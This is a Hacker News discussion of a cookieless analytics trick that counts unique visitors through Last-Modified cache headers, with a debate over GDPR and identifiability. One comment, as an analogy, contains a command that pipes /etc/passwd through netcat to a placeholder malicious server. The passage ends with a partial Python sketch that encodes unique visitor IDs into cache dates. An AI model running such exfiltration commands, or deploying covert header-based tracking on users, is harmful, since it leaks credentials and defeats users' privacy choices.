Using a date-modified header to detect unique visitors without using cookies Author : mulhoon Score : 306 points Date : 2022-11-30 16:04 UTC (6 hours ago) web link (notes.normally.com) | a_c wrote: | Looks like a nice middle ground between no tracking at all and | needing all tracking to know how well your website performs. Seems no | fingerprinting is involved so the website visitor is anonymized. | Unlike cookies where we can store whatever we like, this method | reveals only the unique visit, and its derivatives. | alkonaut wrote: | I very much prefer this to e.g. fingerprinting. This is local to | one site and basically uniqueness only rather than an identifying | id. I don't feel "tracked" or "targeted" by this. | schoen wrote: | Martin Pool discovered pretty much this technique back in 2000: | | https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1 | kiriberty wrote: | Cringe moment: this is abusing the feature that last-modified | was created for. | someweirdperson wrote: | "Counting unique visitors"? | | They are counting repeated requests. The unique count then is | "total requests" minus "repeated requests". | | Wouldn't it be easier to count the number of times a cached | resource is accessed? | BeefWellington wrote: | Time of last access + a counter of your visits once your hits | reach N>2 is probably enough to separate an individual from the | crowd here, unless your site is tremendously busy. | jahewson wrote: | The fact that this is being used in an analytics product that | claims to be compliant with all privacy laws is horrifying. | There's no way this is compliant _and_ it's deceptive. | andix wrote: | I agree. Well-crafted laws (like the GDPR) forbid any kind of | tracking without consent. It's the what and not the how.
It | doesn't matter if it's via cookies or any other way. | pyrolistical wrote: | Please explain why this isn't compliant? | erdos4d wrote: | This is a form of data collection and tracking that is | definitely against GDPR unless the user is informed of it and | consents to it. As it stands, there is no such notification | or consent. IANAL but I strongly suspect it will get you fined | in the EU. | pyrolistical wrote: | What personal information is being collected here? | erdos4d wrote: | GDPR doesn't just cover personal info; it also forbids | tracking without consent, which includes cookies and | other means. This is just a technical trick to track | someone sans cookie, so I'm 100% certain they will fine | anyone doing it unless they get consent. | whartung wrote: | Arguably this can become personally identifiable, much like a | person's height of 7 feet becomes personally identifiable. How | many 7-foot people live in Elko, Nevada? (I have no idea, | perhaps there's an entire colony of them.) But most very tall | people, well, stand out. "You're that tall guy from Elko!" | | Early on, it's not personally identifiable. No doubt there | can be a lot of folks visiting the site only 10 times and | never again. | | But as someone continues to visit, they begin to narrow down | who they are to "You're that guy that comes in here every day | with a yellow hat". They may not "know" who you are, but they | "know" who you are. | | Eventually, there may be that one person that has the highest | hit rate, who always stands out. | jefftk wrote: | _> there may be that one person that has the highest hit | rate, who always stands out._ | | They could stop incrementing once they get to 10 (or | something that's high but common enough to be shared by | thousands of people). | Spivak wrote: | > You're that guy that comes in here every day with a | yellow hat | | Yes, but you have absolutely nothing at all to associate | that back to a person.
Where are you going to find the data, | "personal information of some kind about the people who visit | your site a lot"? You're not collecting it. | bpfrh wrote: | Because the GDPR isn't about any specific technology, but | concerns any processing of personal data: | | https://gdpr.eu/what-is-gdpr/ | | Edit: Huh, I stand corrected; I don't know if this would count | as personal data. | eurasiantiger wrote: | Storing a cache header is not an issue, but if it is used | as a unique identifier for user analytics purposes, it is | almost certainly personally identifying information, at | least after combining with other data. Since they are not | disclosing that they store something they use to ID users, | it is likely a GDPR violation, at least in spirit, and that | spirit is exactly what GDPR seeks to control. | bonestamp2 wrote: | > after combining with other data | | The post says that they don't combine datapoints because | that would negate privacy. | eurasiantiger wrote: | _They_ don't, but anyone using their service could. | ATsch wrote: | It is personal data regardless of how it is used. The | only question is if that use of personal data is | permissible. | | Using it for user analytics, which is neither required to | run the service, nor in the users' interest, nor | reasonably expected by the user, is almost definitely | illegitimate use. | jahewson wrote: | See my reply to b34r. In addition, assigning users into | "anonymous" cohorts is a similar principle to FLoC, which is | likely not GDPR compliant: | https://searchengineland.com/googles-current-floc-tests-aren... | tobr wrote: | That seems very different, as those cohorts are based on | actual personal data (correct me if I've misunderstood this | about FLoC). That's fundamentally different from a counter, | I think. | jahewson wrote: | Yes, that's right, FLoC is explicitly using personal data.
| But now consider that that data is "you visited a | gardening website in the past month" and compare it with | "you visited this website 3 times yesterday" and the two | methods don't look so different. | tobr wrote: | I guess we all have different instincts when it comes to | this, but I find it much more expected and acceptable | that a website can see that I'm returning, than that they | get to know about random other interests I have based on | my general browsing history. | dahfizz wrote: | > Processing personal data to generate the cohort | assignment without the proper consent could also be a | violation | | Using personal data to assign a cohort counts as using | personal data. Duh. The approach described in the article | doesn't use any personal data, though? | eganist wrote: | > Using personal data to assign a cohort counts as using | personal data. Duh. The approach described in the article | doesn't use any personal data, though? | | Quoting the European Commission: | | "Personal data is any information that relates to an | identified or identifiable living individual. Different | pieces of information, which collected together can lead | to the identification of a particular person, also | constitute personal data." | | I'd hazard a guess that it's the second part under which | the EC might find this to be within scope. | dahfizz wrote: | If I gave you a list of all the last-modified headers | from a day, how would you use that information to | identify a person? | ATsch wrote: | The definition of personal data under the GDPR is | anything that can be used to uniquely identify a natural | person (with sufficiently high probability). Both cookies | and date-modified meet that definition identically, as do | IP addresses. | | That doesn't mean you can't use it at all. It just places | strong restrictions on what purposes you can use it for. | The important point is just that those restrictions are | the same under GDPR for all of these technologies.
It | doesn't matter how you uniquely identify users; what | matters is what you do with that information. | dahfizz wrote: | They don't assign a unique date-modified to each user. | They assign _everyone_ the _same_ date modified on their | first visit of the day. I don't accept that this could | be used to uniquely identify a natural person. | | You may be able to look at the headers and see that a | certain user made the most requests that day. That still | tells you nothing about their identity. | mytailorisrich wrote: | Nothing in the technique described here allows one to | identify an individual directly or indirectly, because | 'identifiers' are not unique and really no different than | standard 'last-modified' dates. Even if they were unique, | further data would have to be collected in order to be | able to identify individuals and turn everything into | personal data. | | What the technique may fall foul of, though, are cookie | laws. | Spivak wrote: | You can't just scare-quote "anonymous" without explaining | how it could deanonymize you. You're sitting there with | full access to the count data they collect. Use any | statistical methods you like; figure out which visits were | me. | mytailorisrich wrote: | The article you quote does not suggest that "assigning | users into "anonymous" cohorts is ... is likely not GDPR | compliant" and I fail to see how that would be the case. | Rather, it seems to mention concerns that _processing | personal data_ to do so may be problematic. | b34r wrote: | Why? It's anonymous and doesn't collect any user data other | than IP and stuff from the user agent. | jahewson wrote: | It's not anonymous in a low-entropy situation. A user can be | indirectly identified. This would violate GDPR. | CaveTech wrote: | No, it wouldn't. | jahewson wrote: | Yes, it would, because a unique timestamp allows me to | indirectly identify a user. | SparkyMcUnicorn wrote: | How? | kapep wrote: | It is not a unique timestamp though.
Each day, all | visitors start at 00:00:00. All users that visit the site | a second time get the timestamp 00:00:01 and so on. | CaveTech wrote: | Where are people getting these insane reads of GDPR? Not every | bit of entropy is going to violate GDPR. First, an | active client-server connection is required for any kind of | supposed "identity" contained here, which would of course | include far more unique bits of identity/entropy, such as | IP. Secondly, even if the full DB of page view counts | were leaked, you could not actually use it to identify a | user. | | You have somehow perverted GDPR to believe it to mean `no | client may ever hold a unique state`. Good luck to anyone | making a claim that this is NOT possible in anything but | the most rudimentary application. | pyrolistical wrote: | I don't see how it can be used as described to identify an | individual person. | | Multiple requests end up with the same timestamp, which | means individuals are not traceable but are countable | in aggregate. | jahewson wrote: | Only multiple requests within a given second get the same | timestamp. So if you have fewer than 86k hits per day, | then all your timestamps could be unique. | | Edit: I misread the article here, where it said each | visit incremented the counter by one second. So my | calculation is not correct! | bradstewart wrote: | But how do I then tie that unique timestamp to an actual | _person_? Which is what GDPR is concerned about. | | (edit: spelling) | dahfizz wrote: | How do you go from timestamp to identifying someone? | | ~Every HTTP response has a Date field with a | second-resolution timestamp that might be unique. Are you | equally concerned about that? | TylerE wrote: | Birthday paradox means that will be far lower. | Thorrez wrote: | No, they are truncating the timestamp to the day. So all | visitors to the site on a specific day get the same | initial timestamp. | jahewson wrote: | Ah, so they are, thanks! That's much better.
Though for a | very, very low-traffic site this would still let me track | unique visitors. | genewitch wrote: | It is designed to track unique visitors, but not | differentiate between them at all. | | If both you and I visit the same new site today, we both get | a file our browser caches with today's date at 00:00:01. | Tomorrow when we go to the same site, our browser says we | got the file yesterday, so the server sends a new | modified date to the browser, set to tomorrow's date at | 00:00:02. Both of us have the same "new" file with the | new modification date/time. | | If I go back the following day, the only thing the server | knows for certain, from just this header, is that I've | visited twice before. So I'm not counted as a unique | visitor. | | That this could be used by assigning a _unique_ timestamp | to each visitor is where everyone's mind is going, and | it feels like half are annoyed there's another way to | leak information, and the other half are annoyed they | didn't think of it prior to the end-of-year marketing | bonus deadline. | prpl wrote: | Do people use ETags for such purposes? | cpeterso wrote: | Yes. ETag tracking has been a thing for decades: | | https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags | habibur wrote: | This can be used like a cookie without using cookies, as long as the | definition of a cookie stays "...a cookie is a small file stored on | your computer". | | You have 30 million seconds per year to use as unique identifiers | against each individual for tracking, even though the OP | didn't do it. | | Put an expire time anywhere between 10 years ago and today and that's 300m | users tracked. | superjan wrote: | On the other hand, now that we know about it, it is easy to defeat: | a privacy-conscious browser will just add a random amount of | minutes/seconds to the "if modified since" header. The only | risk is you sometimes trigger a reload because the resource was | modified in that interval.
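The daily scheme that kapep and genewitch describe can be sketched as a server-side handler. This is a hypothetical sketch, not normally.com's code, and it rests on three assumptions. First, following kapep's description, a first visit gets today's date at 00:00:00 and each visit on a later day adds one second. Second, the resource is served so that the browser revalidates it on every page load (for example with `Cache-Control: no-cache`). Third, it borrows jefftk's suggestion of capping the counter. `handle_request`, `CounterResult` and `cap` are invented names.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import NamedTuple, Optional


class CounterResult(NamedTuple):
    status: int          # 200 = send the resource, 304 = cached copy is current
    unique_today: bool   # first request from this browser today?
    visits: int          # distinct days this browser has visited (capped)
    last_modified: str   # value for the Last-Modified response header


def _midnight(moment: datetime) -> datetime:
    """Truncate an aware datetime to 00:00:00 UTC on the same UTC day."""
    return moment.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0)


def handle_request(if_modified_since: Optional[str], now: datetime,
                   cap: int = 10) -> CounterResult:
    """Hypothetical handler: the seconds past midnight in Last-Modified store
    (visits - 1), and the date part records the last day visited."""
    today = _midnight(now)

    cached = None
    if if_modified_since:
        try:
            cached = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            cached = None  # malformed header: treat like a first visit

    if cached is None:
        visits = 1  # no cached copy: a brand-new visitor
    else:
        cached_day = _midnight(cached)
        previous = int((cached.astimezone(timezone.utc) - cached_day).total_seconds()) + 1
        if cached_day == today:
            # Already counted today: keep the header and let the browser reuse its copy.
            return CounterResult(304, False, previous, if_modified_since)
        visits = min(previous + 1, cap)  # returning visitor, first request today

    stamp = today + timedelta(seconds=visits - 1)
    return CounterResult(200, True, visits, format_datetime(stamp, usegmt=True))
```

Because same-day repeats get a 304 with the header unchanged, `visits` counts distinct days rather than page views. The thread does not say whether the real service handles same-day repeats this way.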
| Kuinox wrote: | It's harder, but you still leak bits of information. If the | random function is known, statistical analysis can still leak | out a bit of information. | legitster wrote: | Am I missing something? Abusing the cache metadata to store data | on the user device seems much worse than a cookie. | | I would have serious doubts about the longevity of such a trick, let | alone some of the technical limitations I am sure the service | has. | bonestamp2 wrote: | The missing piece is that no fingerprint is involved. They | don't have a way of identifying that user, but they are still | able to count the number of times that visitor loads the page. | So, it's not a tracker, it's a counter. It's like a loyalty | punch card at your local sandwich shop -- they can track how | many times you've been there by counting the hole punches, but | they don't have a unique identifier, so they can't track | details about those visits. | | On the other hand, a cookie or a browser fingerprint contains | info that can uniquely identify that user, so it can be used for | tracking. | legitster wrote: | A cookie doesn't _have_ to contain a fingerprint though. | | In the same way, nothing in their current method necessarily | says they couldn't find a way to insert a fingerprint here. | bonestamp2 wrote: | Fair enough. At least they've told us how it works, so if | the data no longer matches that methodology in the future, | then we can speculate that they've implanted a UID, unless | they tell us how it works again and the data is consistent | with the new methodology. | o_m wrote: | Cookie tracking without consent is illegal in Europe, so it is | a clever way to still do some basic web analytics. | roelschroeven wrote: | Tracking without consent is illegal in Europe, _regardless of | the method_. Alternative tracking methods are not workarounds | to get around the law; they are only workarounds in trying | not to be caught. | atoav wrote: | Yeah, nice try.
Lawmakers are not _that_ stupid. _Any_ way of | storing personal data is subject to this regulation. | | And before you try the next thing, personal data is | anything that can be linked to a specific user: e.g. IP | addresses have been ruled to be personal data, and so has some UUID that | helps you identify a user. | | People should really read the law, and/or at least literate | commentary on it, instead of assuming things or repeating what | someone else assumed. | mytailorisrich wrote: | This is definitely not personal data. The piece of | information is not linked to an individual and cannot be | used to identify an individual (not the same as a 'user'), | not least because it is not unique to each visitor: | according to the article, all first requests get the same | 'last-modified' date, same for all second requests, etc. | | Still, this stores data in the browser in a way that might | be deemed a technology similar to a cookie, and therefore | this might still fall within the various cookie laws, but | this is completely outside of personal data regs. | masklinn wrote: | Tracking without consent is illegal. This is a clever way to | get absolutely reamed, because you're not only in breach of | data protection laws, you're actively trying to obfuscate it. | andix wrote: | The obfuscation part is probably irrelevant from a legal | perspective. | baggy_trough wrote: | This article is written like it's a great privacy breakthrough, | but why is this any different from dropping a user id cookie? | jamincan wrote: | Users might block cookies, but this will likely still go | through. | jagged-chisel wrote: | How do you get more than 86,400 unique "identifiers" when they | only change every second? | marshray wrote: | A malicious site can put a different identifier on every | resource loaded by the browser. | | There really is no bottom, is there. | koliber wrote: | There are also many timezones and you can encode information | in the timezone indicator as well. Also, you can use
Also, you can use | different days. You can stretch this number into millions. | For a website that gets a certain number of unique visitors | per year, this may be unique enough. | tedunangst wrote: | Subdomains. (Not sure why I immediately thought subdomains | and not just multiple resources.) | toast0 wrote: | who says Last-Modified has to be a current date? you've got | the potential for 1669827111 users as of when I was composing | this comment without giving your users future dates. | WirelessGigabit wrote: | You don't have to. A unique visitor is someone who comes in | without a last-modified header. Set the header, that person | is no longer unique. | nine_k wrote: | It is materially different because it does not track individual | users. | | It's comparable to dropping the same cookie to every visitor on | a particular day; a pretty low level of privacy invasion. | | Also, this allows to _not_ use such things as visitor 's IP | address to collect meaningful statistics, which is a privacy | win for the user, and an accuracy win for the site operator. | kevincox wrote: | Exactly this. It is different from dropping a user id cookie, | but equivalent to dropping a cookie hit_count=0, hit_count=1, | ... | baggy_trough wrote: | Seems like the hit_count cookie would be a lot more | straightforward. | ChoHag wrote: | politelemon wrote: | If the counter is empty for you, disable your adblocker | temporarily. The withcabin.com domain might be blocked. | dahfizz wrote: | Threads like this kinda make me sad about HN. Every single | comment is about how this technique might possibly be abused to | track users in very specific scenarios (i.e. you may be able to | identify your most active user). | | If a web server wanted to track you, they would just use your IP. | This is a clever technical trick to count your number of users | without collecting any personal data. I don't understand why that | is such a bad thing? 
| zackmorris wrote: | I think this cache date trick is clever! | | There are at least three fallacies with stuff like GDPR that | trigger anxiety in people by convincing them that they can | somehow safeguard their own privacy while surfing hundreds of | websites per day, many in other countries. I'm not going to | fully discredit them, just give counterexamples: | | 1) The internet can continue to work without tracking users | | - Targeted advertising (can't have both, although I can't say | that I'll miss ads) | | 2) Users care that companies have their personally identifiable | information (PII) | | - Users care how companies share and abuse their data for | profit (they already know they're being tracked if they don't | use something like TorBrowser) | | 3) Privacy protections actually result in privacy | | - PRISM and similar will always find you: | https://en.wikipedia.org/wiki/List_of_government_mass_survei... | | So I view all of this security theater with utter skepticism. I | think the only thing that can maybe save us is transparency. | Letting users download their data and using the threat of audit | to keep internet companies honest: | | https://securiti.ai/blog/dsar-rights-and-compliance/ | | The rest of the squabbling about "no that's PII, you can't save | that!" has only resulted in endless nagging and distraction. | It's like trying to hide your address from the post office or | thinking that your phone number is secret because it's not in | the phonebook. | | Although I do think it's kind of funny to make big companies | feel like they're living under a police state. They'll work | tirelessly to undermine these protections, which is why we'll | eventually abandon them like we did with prohibition and | McCarthyism because they just aren't enforceable when everyone | is breaking the law. 
Or (equally likely) they'll work to | bolster these laws to create new markets through power | imbalance, ensuring that only the largest companies can meet | compliance and smaller companies pay some sort of protection | money against the threat of litigation, which opens the door to | mass corruption. Both of these scenarios are ugly enough that I | think this entire rabbit hole is suspect. | Sohcahtoa82 wrote: | > If a web server wanted to track you, they would just use your | IP. | | I'd think an HN user would know that using an IP to track isn't | effective. | | For most home desktop users, at best, it tracks an individual | household, not a person. For corporate users and highly | privacy-conscious home users, it's probably completely | worthless, as VPNs will make everyone come from a single IP. | | For mobile users, it's completely worthless. You'd be tracking | users of a specific Wi-Fi network. If your phone is connecting | via IPv4, then who knows who you're tracking, as phones on a | mobile network will share an IP address. | ketralnis wrote: | And if you think VPN users are too obscure a use case to | account for, a specific case I've dealt with is (1) all of | AOL coming from one IP in Virginia (yes, this was a while ago) | and (2) almost every university appearing as a single IP (on | a website frequented by university students). | jgalt212 wrote: | As recently as 2006, an entire country was behind a VPN | using a single public IP address. If lore can be | believed... | | https://superuser.com/questions/1013630/why-does-qatar-use-a... | kccqzy wrote: | Universities do that now? When I was in college, if you | connected to the visitor network they'd give you an RFC 1918 | address with NAT and a restrictive firewall, but if you | connected to the regular network and authenticated as a | student, they gave you a publicly routable IP address. | jesprenj wrote: | Depends on a lot of factors.
The primary school I was a | student at had public IPs on every computer; our national | academic and research network operators are encouraging | local network operators to avoid private IPs. But the | high school at which I'm currently a student has private | IP addresses on every computer and a single external IPv4 | for the entire facility. It's not so one-sided. | lazide wrote: | Many will also push HTTP/HTTPS proxies regardless of IP | addressing schemes, so even if one user bypasses it, | anyone using defaults will come from whatever the | external proxy IP is. | ketralnis wrote: | I went to a community college that did transparent HTTP | proxying with not just deep packet inspection but caching | and "security"-oriented JavaScript injection. Headers | would get reordered, and its parser wasn't perfect, so | multi-line headers would get broken sometimes. They'd | inject JS into pages to scan for... something? Other | injected JS? I have no idea. But it was impossible to | directly connect to another server without going through | their proxy even though from the TCP layer it looked like | you were. Lots of difficult-to-debug issues. | lazide wrote: | Wow, that's impressively evil. Right up there with the | old 'rewrite DNS traffic' trick from ISPs. | | Any idea what make/model the proxy was? | mike_d wrote: | At a previous job we tracked unique visitors to prevent ad | fraud. You'd find not only individual IPs with thousands of | users behind them, but also larger populations of users | numbering in the tens of thousands behind a small block of | 8-16 IPs. | | The craziest was a large multinational corporation that (I | guess for security?) changed their egress IP daily. The | first three octets remained the same and the fourth was | equal to the day of the month UTC. Really screws things up | when you use a 14-day rolling window of previous traffic | for comparisons.
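The failure modes described by Sohcahtoa82, ketralnis and mike_d show up even in a toy unique-IP counter over a 14-day rolling window. All traffic below is made up. The addresses come from the RFC 5737 documentation ranges, and `unique_ips` is a hypothetical helper, not anyone's production code.

```python
from datetime import date, timedelta
from typing import Iterable, Tuple


def unique_ips(hits: Iterable[Tuple[date, str]], end: date, window_days: int = 14) -> int:
    """Count distinct client IPs seen in the window_days days ending on `end`."""
    start = end - timedelta(days=window_days - 1)
    return len({ip for day, ip in hits if start <= day <= end})


end = date(2022, 11, 30)
window = [end - timedelta(days=i) for i in range(14)]

# Hypothetical campus: 500 students behind one NAT address, each visiting daily.
campus = [(day, "198.51.100.7") for day in window for _student in range(500)]

# Hypothetical office: one employee whose egress IP's last octet is the day of month.
office = [(day, f"203.0.113.{day.day}") for day in window]

print(unique_ips(campus, end))  # 1: 500 people counted as one
print(unique_ips(office, end))  # 14: one person counted fourteen times
```

The error runs in both directions. Shared addresses undercount people, and rotating addresses overcount them.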
| bawolff wrote: | I mean, I expect most people who use a VPN to also use | incognito mode, which I assume would prevent this | type of tracking. | IshKebab wrote: | It's not a clever technical trick. It's a pointless technical | trick. | | You can do exactly the same thing with cookies and they are | better for privacy because there's an opt-out mechanism. | They're how you're _supposed_ to do this sort of thing. | | Using a trick like this is no different to cookies in the eyes | of the GDPR. So the only reason to use this trick is if you | don't want to respect your users' choice to protect their privacy by | blocking cookies. | EGreg wrote: | I mean, if people wanted to track visitors without cookies, | they'd just use ETags... | | https://www.secjuice.com/etag-entity-tag-tracking/ | | Has Apple's ITP closed this particular loophole by ignoring | ETags in third-party iframes and capping them to 7 days, etc.? | | It seems browsers will want to restrict ALL first-party cookies | to 7 days unless the visitor explicitly allows some domain to | store their identity. | | Frankly speaking, identity can be done better without cookies. | Look at Web3 sign-ins; we need something built into the browser | and seamless. For now maybe an extension. Then browser makers | can have a privacy mode that retires cookies entirely. | | But how are you supposed to do caching without storing and | sending identifying data equivalent to cookies? | | Thoughts? | fanso99 wrote: | My understanding is that most commenters are less critical of | this specific implementation, but are alarmed by how this new | technique could be used by other more nefarious parties in the | future. | | Counting visits is probably still not a fully GDPR-compliant | use case, as the server stores data on the client's machine | which is indistinguishable from a cookie containing a counter. | tinus_hn wrote: | First, an IP address is considered personal data in the EU.
| | Second, an IP address is not enough: it may change or be | shared. The advertisers 'need' to track you forever to serve | you relevant ads. So they devise all kinds of tricks to do so. | aardvarkr wrote: | > First, an IP address is considered personal data in the EU. | | I don't believe that's true. To my knowledge, GDPR only | treats an IP address as personal data if it is associated with | actual identifying information (like name or address). | Collecting an IP address alone, and not associating it with | anything else, is completely fine (otherwise nginx's and | Apache's default configs would violate GDPR, and through | them basically every website would). | fanso99 wrote: | Collecting IP addresses and linking them to a user ID is | considered PII as far as I know. | EGreg wrote: | So the idea is that you can't legally collect information | in private that you can technically collect. | | As long as a company is able to keep it a secret, they | won't get caught. | | Witness the hundreds of violations of public trust by | Facebook: | | https://www.independent.co.uk/tech/facebook-app-recording-ca... | | The only complete solution is technological! | mytailorisrich wrote: | That's correct. IP addresses are not personal data in | themselves, but they may become so if further data are | collected or accessible which allow individuals to be identified | when used together with IP addresses. | rzzzt wrote: | CGNAT complicates matters even further. Sometimes I'm placed | way off within <country> if a site tries to go by GeoIP | databases, as the provider placed a bunch of households | behind a single address. | JohnFen wrote: | After decades of straight-up abuse by this sector of the | industry, including the subversion of countless "privacy | respecting" data collection techniques, I think an | extraordinary amount of skepticism and suspicion is more than | understandable. | kccqzy wrote: | Why would you put "privacy respecting" in quotes?
The | subversion of those techniques is probably just because | those techniques are so new and people haven't had better | technologies yet. | | I personally see those privacy-respecting data | collection techniques as a parallel to the development and | use of cryptography on the web. In the beginning pretty much | no one online used cryptography; later on we started using | it but used weak ciphers ("export" cipher suites, for example, | or just look at the issues in early protocols like SSL 2.0 or | SSL 3.0); nowadays almost everyone uses strong cryptography. | Similarly, in the beginning pretty much no one cared about | privacy when they did data collection; then we began to | care more about privacy, but many schemes are easily broken | due to, for example, misguided ideas of anonymization | ("anonymization by hashing"), and we are also starting to see | the development of newer private information retrieval | schemes and differential privacy, etc. Unlike the cynics on | this HN thread, I am quite confident that maybe a decade down | the road the majority of data collection done by companies | will be in a privacy-preserving manner. Of course there will | be outliers, much like there are still websites that don't use | HTTPS, but those will be few and far between. | JohnFen wrote: | I quoted the term not with the intention of disparaging the | notion, but to indicate that I'm referring to a specific | class of approaches. That said, the term has also been | abused to the point where when it's used, I immediately | doubt that it's accurate. | mozman wrote: | Fingerprinting using WebRTC is far more effective. IPs are | useless. | nottorp wrote: | We tend to object to people considering it normal to track us, | regardless of means. | dahfizz wrote: | This is not tracking. Could you explain why you think it is? | fanso99 wrote: | Storing a cookie with a counter still requires consent | AFAIK. If I am right, then this technique is not | sufficiently different and also requires consent.
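kccqzy gives "anonymization by hashing" as an example of a misguided scheme. It breaks because the input space is small: an unsalted hash of an IPv4 address can be reversed by hashing every candidate address. The sketch below searches a single /24 so it finishes instantly. The addresses come from the RFC 5737 documentation ranges, and the function names are hypothetical.

```python
import hashlib
import ipaddress
from typing import Optional


def hash_ip(ip: str) -> str:
    """Naive 'anonymization': an unsalted SHA-256 digest of the address string."""
    return hashlib.sha256(ip.encode("ascii")).hexdigest()


def reverse_hash(digest: str, network: str) -> Optional[str]:
    """Recover the address by hashing every candidate in `network`."""
    for candidate in ipaddress.ip_network(network):
        if hash_ip(str(candidate)) == digest:
            return str(candidate)
    return None


stored = hash_ip("192.0.2.42")               # what a log might keep instead of the IP
print(reverse_hash(stored, "192.0.2.0/24"))  # 192.0.2.42, after at most 256 hashes
```

The whole IPv4 space is only 2^32 (about 4.3 billion) addresses, which is small enough to enumerate exhaustively. Running the same loop over every address costs compute time but puts up no real barrier.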
If I am right, then this technique is not | sufficiently different and also requires consent. | robertlagrant wrote: | Why would that require consent? | chriswarbo wrote: | Consent is _always_ required; even if you just give | people a random UUID, with no associated session /etc., | that _always_ requires consent. | | There is a separate question, of whether consent is | implied. If the identifying information is required to | provide the user with a service they requested (e.g. a | cookie for their online shopping cart), then consent is | implied; no need to ask. | nottorp wrote: | Could you explain why i should care, considering the | current climate online? | | When you try to cram a list of 500 "legitimate interests" | down my throat, I will consider no interest as legitimate. | | No matter what your goals are, you're in an industry that | has zero trust these days. | dahfizz wrote: | Without viable alternatives, sites will continue to use | Google Analytics. If people like you fear-monger every | alternative, sites will continue to use Google Analytics. | | The method described in the article collects no personal | data, collects no identifiable data, and is objectively | more user-respecting than Google Analytics. But the | behavior by people like you will help make sure that | these alternatives don't gain traction and Google | maintains their monopoly. | EGreg wrote: | Not only that. The ability to track your own visitors is | BUILT INTO how the web operates. | | All a site has to do is include analytics in its server- | side library. And that's it. Doesnt even need CNAME | cloaking. It can send the analytics anywhere. | | The thing ITP and others try to stop is tracking users | ACROSS sites. | | But if you use single-sign-on with FB or any other | service, they can get your public photo, name and just | find you on faceboon thru some search engine that | spidered all profiles. 
| | So if you really want to be anonymous, stop using the | single sign on and reusing passwords etc. | ohbtvz wrote: | But google analytics isn't viable. It's illegal to use in | the EU. Here's an explanation by, well, a viable | alternative to google analytics: | https://matomo.org/blog/2022/05/google-analytics-4-gdpr/ | | (I don't have a horse in this battle - my personal | website doesn't have analytics at all.) | stalfosknight wrote: | How about we just _stop_ tracking users and hoovering up | private data? | xapata wrote: | Who's "we"? I don't mind it. I want advertisers to give me | more relevant advertising. | mschuster91 wrote: | I don't want _any_ unsolicited advertising - and I wish our | societies would decide to outright _ban_ advertising: | Outdoor advertising is a nuisance for the eyes, radio and | TV advertising is annoying AF (particularly as it tends to | be mixed at a much greater loudness than the program | running, my conspiracy theory is that this is done so | people are forced to hear it when they go to the loo), | paper advertising (e.g. in newspapers, flyers or postal | spam) is a waste of paper and online advertising is an | insane danger for privacy and a vector for distribution of | malware. | | Ideally, we'd have independent consumer protection | entities, either government or private (e.g. German | Stiftung Warentest), that would get products from companies | to rank and test, so consumers could make actually informed | decisions instead of being lured by hyped up advertising | claims. | dspillett wrote: | Depends how you define relevant. Since actively trying to | block stalky advertising behaviours I've had more | interesting adverts (by "interesting" I mean new-to-me, not | the "do you want another one of the thing you've already | bought all you need of for a while" types). Things are | relevant enough if, for instance, I get running related | adverts while reading an article about other runners or | browsing shoes. 
| | In my experience the stalky behaviour doesn't improve the | advertising relevance from my PoV, so the fact it means | that all that derived information, some of it definitely | PII, is out there so should anyone be able to hack into it | they could use it for fraudulent purposes (identity theft, | spear-phishing my contacts, ...), makes the situation lose- | lose for me. | | It is worse for other people, as they have information that | advertisers like to derive that might be extra sensitive. | Being white, male, cis, middle-class, etc, with a life not | interesting enough for there to be much to convincingly | blackmail or threaten me about, living in western Europe, | I'm pretty safe, but this can't be said for others | especially in certain parts of the world (scarily religious | ruled countries with bad records on individual rights, like | Qatar and America to give two examples). | xapata wrote: | I think you're conflating two different kinds of | surveillance. The article is incrementing a counter to | track the number of unique visitors. | | If one is worried about blackmail or violence, especially | from a government, then one should take precautions | beyond complaining about the prevalence of browser | cookies. Modern life, carrying a mobile internet device | with GPS service, using a credit card, and going to | places with security cameras, presents a variety of | surveillance methods. | throwaway0x7E6 wrote: | we the normal people | lolinder wrote: | Counting is not the same as tracking. The technique proposed | would in most cases be useless for trying to _distinguish_ | individuals, much less identify them. It's the computer | equivalent of the person standing out in front of Costco with | a clicker counter. | MereInterest wrote: | In principle, screen resolution would in most cases be | useless for trying to distinguish individuals. After all, | it wouldn't even distinguish the underlying hardware, let | alone a user of that hardware.
But given omnipresent | tracking, it's one more bit that can be used to identify | you. | | In addition, your comment shows a severe lack of | imagination. Suppose I'm a malicious server who wishes to | track users. | | * For each new user, select a random "last-modified" date. | Now, I can clearly distinguish between multiple different | users, because "1985-01-01T00:00:10" is probably the 10th | visit from whoever was given "1985-01-01T00:00:00" on their | first visit. | | * If I have too many users for the above approach to | uniquely identify a person, add more cached items. With | HTTP/2, both HTTP requests would use the same TCP | connection, so I can correlate the requests together. | | And, bam. That goes from "useless for trying to distinguish | individuals, much less identify them" to a unique | identifier stored in the cache invalidation dates. | lolinder wrote: | That is a different technique that uses the same medium | of storage. When I say "this technique" I'm referring to | specifically what was discussed in the article. | | "Evil tracking companies will do evil things with any | protocol features you give them" is already well known | and there's not much to say about it that hasn't been | said. What OP is _actually_ doing is clever and new to | me. | MereInterest wrote: | I agree that it is clever, and it is new to me as well. | However, saying that an obvious extension to a technique | (posted by multiple people independently, no less) is a | different technique altogether and therefore not germane | is going a bit far. | | If I post a privilege escalation exploit that allows me | to execute "cat /etc/sudoers", and somebody points out | that it could also be used to execute "cat /etc/passwd | | netcat malicious-remote-server.com", that's an obvious | extension of the same technique. This is the same, where | the same technique may be used for more intrusive attacks | than are performed in the initial proof of concept.
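To make MereInterest's objection concrete, here is a minimal Python sketch of the abuse described above, not of what the article does. Everything in it is hypothetical: the `BASE` date, the fixed block of `SLOT_SECONDS` seconds reserved per visitor, and the helper names. Each new visitor gets a random Last-Modified date, and the server later reads both an identifier and a visit count back out of If-Modified-Since.

```python
import random
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Hypothetical parameters: each visitor owns a block of SLOT_SECONDS seconds
# starting at BASE; the offset inside that block is the visit count.
BASE = datetime(1985, 1, 1, tzinfo=timezone.utc)
SLOT_SECONDS = 1000
MAX_VISITORS = 1_000_000


def _encode(visitor_id: int, visits: int) -> str:
    """Pack an ID and a visit count into an HTTP-date (second precision)."""
    stamp = BASE + timedelta(seconds=visitor_id * SLOT_SECONDS + visits)
    return format_datetime(stamp, usegmt=True)


def first_visit(rng: random.Random) -> tuple[int, str]:
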